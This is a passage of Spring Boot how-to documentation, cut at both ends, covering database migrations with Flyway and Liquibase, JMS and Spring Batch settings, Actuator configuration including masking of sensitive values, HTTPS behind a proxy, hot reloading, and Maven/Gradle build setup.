higher-level migration tools: https:\/\/flywaydb.org\/[Flyway] and https:\/\/www.liquibase.org\/[Liquibase].\n\n\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the `org.flywaydb:flyway-core` to your classpath.\n\nTypically, migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an underscore-separated version, such as '`1`' or '`2_1`').\nBy default, they are in a directory called `classpath:db\/migration`, but 
you can modify that location by setting `spring.flyway.locations`.\nThis is a comma-separated list of one or more `classpath:` or `filesystem:` locations.\nFor example, the following configuration would search for scripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts.\nAssume the following:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the directory to use according to the type of the database (such as `db\/migration\/mysql` for MySQL).\nThe list of supported databases is available in {spring-boot-module-code}\/jdbc\/DatabaseDriver.java[`DatabaseDriver`].\n\nMigrations can also be written in Java.\nFlyway will be auto-configured with any beans that implement `JavaMigration` (see the sketch at the end of this section).\n\n{spring-boot-autoconfigure-module-code}\/flyway\/FlywayProperties.java[`FlywayProperties`] provides most of Flyway's settings and a small set of additional properties that can be used to disable the migrations or switch off the location checking.\nIf you need more control over the configuration, consider registering a `FlywayConfigurationCustomizer` bean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration.\nIf you would like more control, provide a `@Bean` that implements {spring-boot-autoconfigure-module-code}\/flyway\/FlywayMigrationStrategy.java[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration` directory.\nTo use Java-based callbacks, create one or more beans that implement `Callback`.\nAny such beans are automatically registered with `Flyway`.\nThey can be ordered by using `@Order` or by implementing `Ordered`.\nBeans that implement the deprecated `FlywayCallback` interface can also be detected; however, they cannot be used alongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you would like to use a different `DataSource`, you can create one and mark its `@Bean` as `@FlywayDataSource`.\nIf you do so and want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Flyway's native `DataSource` by setting `spring.flyway.[url,user,password]` in external properties.\nSetting either `spring.flyway.url` or `spring.flyway.user` is sufficient to cause Flyway to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nYou can also use Flyway to provide data for specific scenarios.\nFor example, you can place test-specific migrations in `src\/test\/resources` and they are run only when your application starts for testing.\nAlso, you can use profile-specific configuration to customize `spring.flyway.locations` so that certain migrations run only when a particular profile is active.\nFor example, in `application-dev.properties`, you might specify the following setting:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is active.
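\n\nAs mentioned earlier, migrations can also be written in Java and exposed as beans.\nThe following is a minimal sketch; the class name (from which Flyway derives the migration version) and the SQL statement are illustrative:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Component\n\tpublic class V2__AddPeople extends BaseJavaMigration {\n\n\t\t@Override\n\t\tpublic void migrate(Context context) throws Exception {\n\t\t\t\/\/ Flyway runs this exactly once and records it in its schema history table\n\t\t\ttry (Statement statement = context.getConnection().createStatement()) {\n\t\t\t\tstatement.execute(\"insert into people (name) values ('Alice')\");\n\t\t\t}\n\t\t}\n\n\t}\n----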
\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the `org.liquibase:liquibase-core` dependency to your classpath.\n\n[NOTE]\n====\nWhen you add the `org.liquibase:liquibase-core` dependency to your classpath, database migrations run by default both during application startup and before your tests run.\nThis behavior can be customized by using the configprop:spring.liquibase.enabled[] property, setting different values in the `main` and `test` configurations.\nIt is not possible to use two different ways to initialize the database (e.g. Liquibase for application startup, JPA for test runs).\n====\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`, but you can change the location by setting `spring.liquibase.change-log`.\nIn addition to YAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you need to use a different `DataSource`, you can create one and mark its `@Bean` as `@LiquibaseDataSource`.\nIf you do so and you want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Liquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in external properties.\nSetting either `spring.liquibase.url` or `spring.liquibase.user` is sufficient to cause Liquibase to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nSee {spring-boot-autoconfigure-module-code}\/liquibase\/LiquibaseProperties.java[`LiquibaseProperties`] for details about available settings such as contexts, the default schema, and others.\n\n\n\n[[howto-messaging]]\n== Messaging\nSpring Boot offers a number of starters that include messaging.\nThis section answers questions that arise from using messaging with Spring Boot.\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the support of transactions altogether.\nIf you create your own `JmsListenerContainerFactory`, there is nothing to do, since, by default, it cannot be transacted.\nIf you want to use the `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you can disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any other factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\nA number of questions often arise when people use Spring Batch from within a Spring Boot application.\nThis section addresses those questions.\n\n\n\n[[howto-spring-batch-specifying-a-data-source]]\n=== Specifying a Batch Data Source\nBy default, batch applications require a `DataSource` to store job details.\nSpring Batch expects a single `DataSource` by default.\nTo have it use a `DataSource` other than the application's main `DataSource`, declare a `DataSource` bean, annotating its `@Bean` method with `@BatchDataSource`.\nIf you do so and want two data sources, remember to mark the other one `@Primary`.
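\n\nA minimal sketch of that arrangement follows; the `app.datasource` and `app.batch.datasource` property prefixes are illustrative:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Bean\n\t@Primary\n\t@ConfigurationProperties(\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn DataSourceBuilder.create().build();\n\t}\n\n\t\/\/ Used by Spring Batch for its job meta-data\n\t@Bean\n\t@BatchDataSource\n\t@ConfigurationProperties(\"app.batch.datasource\")\n\tpublic DataSource batchDataSource() {\n\t\treturn DataSourceBuilder.create().build();\n\t}\n----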
\n\nTo take greater control, implement `BatchConfigurer`.\nSee {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[the Javadoc of `@EnableBatchProcessing`] for more details.\n\nFor more information about Spring Batch, see the {spring-batch}[Spring Batch project page].\n\n\n\n[[howto-spring-batch-running-jobs-on-startup]]\n=== Running Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing` to one of your `@Configuration` classes.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see {spring-boot-autoconfigure-module-code}\/batch\/JobLauncherApplicationRunner.java[`JobLauncherApplicationRunner`] for details).\nYou can narrow down to a specific job or jobs by specifying `spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\nSee {spring-boot-autoconfigure-module-code}\/batch\/BatchAutoConfiguration.java[BatchAutoConfiguration] and {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[@EnableBatchProcessing] for more details.\n\n\n\n[[howto-spring-batch-running-command-line]]\n=== Running from the Command Line\nSpring Boot converts any command line argument starting with `--` to a property to add to the `Environment` (see <<spring-boot-features.adoc#boot-features-external-config-command-line-args,accessing command line properties>>).\nThis mechanism should not be used to pass arguments to batch jobs.\nTo specify batch arguments on the command line, use the regular format (i.e. 
without `--`), as shown in the following example:\n\n[indent=0,subs="attributes"]\n----\n\t$ java -jar myapp.jar someParameter=someValue anotherParameter=anotherValue\n----\n\nIf you specify a property of the `Environment` on the command line, it is ignored by the job.\nConsider the following command:\n\n[indent=0,subs="attributes"]\n----\n\t$ java -jar myapp.jar --server.port=7070 someParameter=someValue\n----\n\nThis provides only one argument to the batch job: `someParameter=someValue`.\n\n\n\n[[howto-spring-batch-storing-job-repository]]\n=== Storing the Job Repository\nSpring Batch requires a data store for the `Job` repository.\nIf you use Spring Boot, you must use an actual database.\nNote that it can be an in-memory database (see {spring-batch-docs}job.html#configuringJobRepository[Configuring a Job Repository]).\n\n\n\n[[howto-actuator]]\n== Actuator\nSpring Boot includes the Spring Boot Actuator.\nThis section answers questions that often arise from its use.\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP port.\nTo make the application listen on a different port, set the external property: configprop:management.server.port[].\nTo listen on a completely different network address (such as when you have an internal network for management and an external one for user applications), you can also set `management.server.address` to a valid IP address to which the server is able to bind.\n\nFor more detail, see the {spring-boot-actuator-autoconfigure-module-code}\/web\/server\/ManagementServerProperties.java[`ManagementServerProperties`] source code and "`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`" in the "`Production-ready features`" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if you encounter a server error (machine clients consuming JSON and other media types should see a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using.\nNote that Spring Boot still tries to resolve the error view, so you should probably add your own error page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you use.\nFor example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftlh` template.\nIn general, you need a `View` that resolves with a name of `error` or a `@Controller` that handles the `\/error` path.\nUnless you replaced some of the default configuration, you should find a `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would be a simple way of doing that.\nSee {spring-boot-autoconfigure-module-code}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.java[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on "`<<spring-boot-features.adoc#boot-features-error-handling, Error Handling>>`" for details of how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n[[howto-sanitize-sensitive-values]]\n=== Sanitize Sensitive Values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive, so keys matching a certain pattern are sanitized by default (i.e. their values are replaced by `+******+`).\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize` and `management.endpoint.configprops.keys-to-sanitize` properties, respectively.
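\n\nFor example, to sanitize any `env` entry whose key contains `pass` or is exactly `my-secret-key` (both illustrative values), you could set the following:\n\n[source,properties,indent=0]\n----\n\tmanagement.endpoint.env.keys-to-sanitize=.*pass.*,my-secret-key\n----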
\n\nSpring Boot uses sensible defaults for such keys: any key ending with the word "password", "secret", "key", "token", "vcap_services", "sun.java.command", "uri", "uris", "address" or "addresses" is sanitized.\nAdditionally, any key that holds the word `credentials` as part of the key is sanitized (configured as a regular expression, i.e. `+.*credentials.*+`).\n\nIf any of the keys to sanitize are in URI format (i.e. `<scheme>:\/\/<username>:<password>@<host>:<port>\/`), only the password part is sanitized.\n\n\n\n[[howto-map-health-indicators-to-metrics]]\n=== Map Health Indicators to Micrometer Metrics\nSpring Boot health indicators return a `Status` type to indicate the overall system health.\nIf you want to monitor or alert on levels of health for a particular application, you can export these statuses as metrics via Micrometer.\nBy default, the status codes "`UP`", "`DOWN`", "`OUT_OF_SERVICE`" and "`UNKNOWN`" are used by Spring Boot.\nTo export these, you need to convert the statuses to a set of numbers so that they can be used with a Micrometer `Gauge`.\n\nThe following example shows one way to write such an exporter:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\ninclude::{code-examples}\/actuate\/metrics\/MetricsHealthMicrometerExportExample.java[tag=configuration]\n----\n\n\n\n[[howto-security]]\n== Security\nThis section addresses questions about security when working with Spring Boot, including questions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application, it switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`, or `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not created.\nThis means you have the full feature set of Spring Security available (such as {spring-security-docs}#servlet-authentication[various authentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important chore for any application.\nIf you use Tomcat as a servlet container, then Spring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some environment settings, and you should be able to rely on the `HttpServletRequest` to report whether it is secure or not (even downstream of a proxy server that handles the real SSL termination).\nThe standard behavior is determined by the presence or absence of certain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are conventional, so it should work with most front-end proxies.\nYou can switch on the valve 
by adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-forwarded-for\n\tserver.tomcat.remoteip.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve.\nAlternatively, you can add the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some) requests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following `HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-hotswapping]]\n== Hot Swapping\nSpring Boot supports hot swapping.\nThis section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading.\nThe recommended approach is to use <<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides additional development-time features, such as support for fast application restarts and LiveReload as well as sensible development-time configuration (such as template caching).\nDevtools works by monitoring the classpath for changes.\nThis means that static resource changes must be \"built\" for the change to take effect.\nBy default, this happens automatically in Eclipse when you save your changes.\nIn IntelliJ IDEA, the Make Project command triggers the necessary build.\nDue to the <<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart exclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do development (all modern IDEs allow reloading of static resources and usually also allow hot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can be configured (see the `addResources` property) to support running from the command line with reloading of static files directly from source.\nYou can use that with an external css\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration option to disable caching (described later in this document).\nIf you use the `spring-boot-devtools` module, these properties are <<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>> for you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`] for other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`.\nSee 
{spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`] for other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`] for other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as https:\/\/www.jrebel.com\/products\/jrebel[JRebel], it is usually significantly faster than a \"`cold start`\".\nYou should probably give it a try before investigating some of the more complex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it should reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\nSpring Boot includes build plugins for Maven and Gradle.\nThis section answers common questions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing the coordinates, name, and version of the project.\nBoth plugins can also be configured to add additional properties.\nThe build information is written to a `build-info.properties` file; when such a file is present, Spring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-docs}#goals-build-info[Spring Boot Maven Plugin documentation] for more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the {spring-boot-gradle-plugin-docs}#integrating-with-actuator-build-info[Spring Boot Gradle Plugin documentation] for more details.
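\n\nOnce the build information has been generated, the auto-configured `BuildProperties` bean can be injected like any other bean.\nThe following sketch (the `BuildInfoLogger` component is hypothetical, and imports are omitted as in the other examples) shows one way to read the project name and version:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class BuildInfoLogger {\n\n\t\tprivate final BuildProperties buildProperties;\n\n\t\tpublic BuildInfoLogger(BuildProperties buildProperties) {\n\t\t\tthis.buildProperties = buildProperties;\n\t\t}\n\n\t\tpublic void logBuildInfo() {\n\t\t\t\/\/ The group, artifact, name, version and build time are all exposed\n\t\t\tSystem.out.println(this.buildProperties.getName() + \" \" + this.buildProperties.getVersion());\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\nBoth Maven and Gradle allow generating a `git.properties` file containing information about the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to generate a `git.properties` file.\nTo use it, add the following declaration to your 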
POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the https:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"2.2.2\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format: `yyyy-MM-dd'T'HH:mm:ssZ`.\nThis is the default format for both plugins listed above.\nUsing this format lets the time be parsed into a `Date` and lets its format, when serialized to JSON, be controlled by Jackson's date serialization settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nThe `spring-boot-dependencies` POM manages the versions of common dependencies.\nThe Spring Boot plugins for Maven and Gradle allow these managed dependency versions to be customized using build properties.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of third-party dependencies.\nOverriding versions may cause compatibility issues.\n\nTo override dependency versions with Maven, see {spring-boot-maven-plugin-docs}#using[this section] of the Maven plugin's documentation.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-docs}#managing-dependencies-customizing[this section] of the Gradle plugin's documentation.
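\n\nAs an illustrative sketch for Maven builds that inherit from `spring-boot-starter-parent`, a managed version can typically be overridden by redefining the corresponding version property in your `pom.xml` (the `slf4j.version` property and value below are examples; the authoritative property names are defined in the `spring-boot-dependencies` POM):\n\n[source,xml,indent=0]\n----\n\t<properties>\n\t\t<!-- Overrides the SLF4J version managed by spring-boot-dependencies -->\n\t\t<slf4j.version>1.7.30<\/slf4j.version>\n\t<\/properties>\n----\n\n\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR.\nIf you use the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are repackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin.\nHowever, you must additionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-docs}#repackage[plugin documentation] for full usage details.\n\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency.\nIf your application contains classes that you want to share with other projects, the recommended approach is to move that code into a separate module.\nThe separate module can then be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle plugins must be configured to produce a 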
separate artifact that is suitable for use as a dependency.\nThe executable archive cannot be used as a dependency because the <<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar format>> packages application classes in `BOOT-INF\/classes`.\nThis means that they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is executable, a classifier must be specified.\nThis classifier is applied to the name of the executable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----
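\n\nA rough Gradle equivalent, assuming the 2.x Spring Boot Gradle plugin (which disables the plain `jar` task by default), might look like the following; see the Gradle plugin's documentation for the definitive configuration:\n\n[source,groovy,indent=0]\n----\n\tbootJar {\n\t\t\/\/ The executable archive gets the classifier...\n\t\tarchiveClassifier = 'exec'\n\t}\n\n\tjar {\n\t\t\/\/ ...and the plain archive is re-enabled for use as a dependency\n\t\tenabled = true\n\t}\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems.\nFor example, JRuby includes its own nested jar support, which assumes that the `jruby-complete.jar` is always directly available as a file in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be automatically unpacked when the executable jar first runs.\nSuch nested jars are written beneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that it will not delete the jars that have been unpacked to the temporary directory while the application is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven Plugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products, the executable version has additional configuration files that are not needed in a library jar.\nFor example, the `application.yml` configuration file might be excluded from the non-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar for the library, as 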
follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you can use the `jvmArguments` property of the {spring-boot-maven-plugin-docs}[Maven plugin].\n\nSee {spring-boot-maven-plugin-docs}#run-example-debug[this example] for more details.
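\n\nFor example, a typical invocation might look like the following (the JDWP options and port 5005 shown here are illustrative):\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ mvn spring-boot:run -Dspring-boot.run.jvmArguments=\"-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005\"\n----\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using spring-boot-antlib\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war archive.\nTo make it executable, you can either use the `spring-boot-antlib` module or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested `BOOT-INF\/classes` directory.\n If you are building a war, package the application's classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib-provided` for a war.\n Remember *not* 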